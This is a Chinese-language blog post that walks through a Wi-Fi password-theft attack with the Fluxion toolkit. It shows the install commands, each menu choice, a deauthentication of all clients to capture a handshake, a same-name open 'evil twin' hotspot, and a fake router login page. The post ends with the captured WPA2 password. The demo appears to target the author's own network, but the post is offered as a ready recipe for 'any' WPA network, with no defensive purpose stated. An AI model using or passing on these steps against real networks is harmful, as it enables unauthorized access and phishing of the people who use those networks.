theKingOfNight's Blog

Hacking-any-WPA/WPA2-PSK-without-BruteForce

字数统计: 891阅读时长: 4 min
2019/02/01 Share

Fluxion is based on the programs such as aircrack-ng, mdk3, hostapd etc.

实验所需文件

准备条件

下载下来之后

1
2
3
4
5
6
7
8
9
┌─[thekingofnight@parrot]─[~/Desktop/test/test]
└──╼ $ls
add.py airmon arch-install fluxion Installer.sh LICENSE logos.zip README.md remove.py
┌─[thekingofnight@parrot]─[~/Desktop/test/test]
└──╼ $chmod 777 *
┌─[thekingofnight@parrot]─[~/Desktop/test/test]
└──╼ $apt-get update
┌─[✗]─[thekingofnight@parrot]─[~/Desktop/test/test]
└──╼ $sudo proxychains ./Installer.sh

等待安装完成,完成标志,再次运行Installer.sh,结果如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#########################################################
# #
# FLUXION 2 < Fluxion Is The Future > #
# by Deltax, Strasharo and ApatheticEuphoria #
# #
#########################################################
Aircrack-ng.....OK!
Aireplay-ng.....OK!
Airodump-ng.....OK!
Bully...........OK!
Curl............OK!
Dhcpd...........OK!
Hostapd.........OK!
Iwconfig........OK!
Lighttpd........OK!
Macchanger......OK!
Mdk3............OK!
Nmap............OK!
Openssl.........OK!
Php-cgi........OK!
Pyrit...........OK!
Python..........OK!
Reaver..........OK!
rfkill..........OK!
Unzip...........OK!
Xterm...........OK!
Zenity..........OK!
strings..........OK!
fuser............OK!

1
./fluxion

实战

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[i] Select your language
[1] English
[2] German
[3] Romanian
[4] Turkish
[5] Spanish
[6] Chinese
[7] Italian
[8] Czech
[9] Greek
[deltaxflux@fluxion]-[~]

这样即是运行成功,这里以English举例

1
2
3
4
5
6
7
[i] Select channel
[1] All channels
[2] Specific channel(s)
[3] Back
[deltaxflux@fluxion]-[~]1

选择1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
WIFI LIST
ID MAC CHAN SECU PWR ESSID
......
[37] 90:94:xx:xx:xx:xx 11 WPA2 65% theKingOfNight
......
(*) Active clients
Select target. For rescan type r

选择37

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
INFO WIFI
SSID = theKingOfNight / WPA2
Channel = 11
Speed = 30 Mbps
BSSID = 90:94:97:xx:xx:xx ( )
[i] Select Attack Option
[1] FakeAP - Hostapd (Recommended)
[2] FakeAP - airbase-ng (Slower connection)
[3] WPS-SLAUGHTER - Bruteforce WPS Pin
[4] Bruteforce - (Handshake is required)
[5] Back

选择1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
INFO WIFI
SSID = theKingOfNight / WPA2
Channel = 11
Speed = 30 Mbps
BSSID = 90:94:97:xx:xx:xx ( )
handshake location (Example: /home/thekingofnight/Desktop/test/test.cap)
Press ENTER to skip
Path:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[i] Handshake check
[1] aircrack-ng (Miss chance)
[2] pyrit
[3] Back
[deltaxflux@fluxion]-[~]1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[i] *Capture Handshake*
[1] Deauth all
[2] Deauth all [mdk3]
[3] Deauth target
[4] Rescan networks
[5] Exit
[deltaxflux@fluxion]-[~]1

使所有用户断开wifi,然后默认设备会自动重连wifi,也就给我们一个握手包。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[i] *Capture Handshake*
Status handshake:
[1] Check handshake
[2] Back (Select another deauth method)
[3] Select another network
[4] Exit
#> 1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
INFO WIFI
SSID = theKingOfNight / WPA2
Channel = 11
Speed = 30 Mbps
BSSID = 90:94:97:xx:xx:xx ( )
[i] Select your option
[1] Web Interface
[2] Bruteforce
[3] Exit
#?1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
[i] Select Login Page
[1] English [ENG] (NEUTRA)
[2] German [GER] (NEUTRA)
[3] Russian [RUS] (NEUTRA)
[4] Italian [IT] (NEUTRA)
[5] Spanish [ESP] (NEUTRA)
[6] Portuguese [POR] (NEUTRA)
[7] Chinese [CN] (NEUTRA)
[8] French [FR] (NEUTRA)
[9] Turkish [TR] (NEUTRA)
[10] Romanian [RO] (NEUTRA)
[11] Hungarian [HU] (NEUTRA)
[12] Arabic [ARA] (NEUTRA)
[13] Greek [GR] (NEUTRA)
[14] Czech [CZ] (NEUTRA)
[15] Norwegian [NO] (NEUTRA)
[16] Bulgarian [BG] (NEUTRA)
[17] Serbia [SRB] (NEUTRA)
[18] Polish [PL] (NEUTRA)
[19] Indonesia [ID] (NEUTRA)
[20] Dutch [NL] (NEUTRA)
[21] Danish [DAN] (NEUTRA)
[22] Hebrew [HE] (NEUTRA)
[23] Thailand [TH] (NEUTRA)
[24] Belkin [ENG]
[25] Netgear [ENG]
[26] Huawei [ENG]
[27] Verizon [ENG]
[28] Netgear [ESP]
[29] Arris [ESP]
[30] Vodafone [ESP]
[31] TP-Link [ENG]
[32] TP-Link [ITA]
[33] Back
#? 7

现在会出来一个名称一样的,开放的wifi热点,之前加密的已经连接不上了。
image.png

安全意识不高的人们会默认连接名称相同的开放热点

此时,链接上网络的设备使用浏览器或者app默认会跳转到如下界面
image.png

输入完成后,页面跳转为
image.png

手机端也类似
image.png

最后

1
2
3
4
5
6
7
8
9
10
11
┌─[root@parrot]─[/home/thekingofnight/Desktop/test/test]
└──╼ #cat /root/theKingOfNight-password.txt
FLUX 0.23 by deltax
SSID: theKingOfNight
BSSID: 90:94:xx:xx:xx:xx ()
Channel: 11
Security: WPA2
Time: 00:15:16
Password: 1234567890

一些坑

恢复网络的解决方法

1
2
3
4
5
6
┌─[✗]─[root@parrot]─[/home/thekingofnight]
└──╼ #ifconfig wlan0mon down
┌─[root@parrot]─[/home/thekingofnight]
└──╼ #iwconfig wlan0mon channel 11
┌─[root@parrot]─[/home/thekingofnight]
└──╼ #service network-manager start

Fluxion无法监听的解决方法

1
2
airmon-ng check kill
airmon-ng start wlan0

参考

https://www.youtube.com/watch?v=gwF2mcbmfKQ&list=PLjo33Hih06ps2dlJMflCU7tYA7dzk_xYl&index=29

CATALOG
  1. 1. 准备条件
  2. 2. 实战
  3. 3. 一些坑
    1. 3.1. 恢复网络的解决方法
    2. 3.2. Fluxion无法监听的解决方法
  4. 4. 参考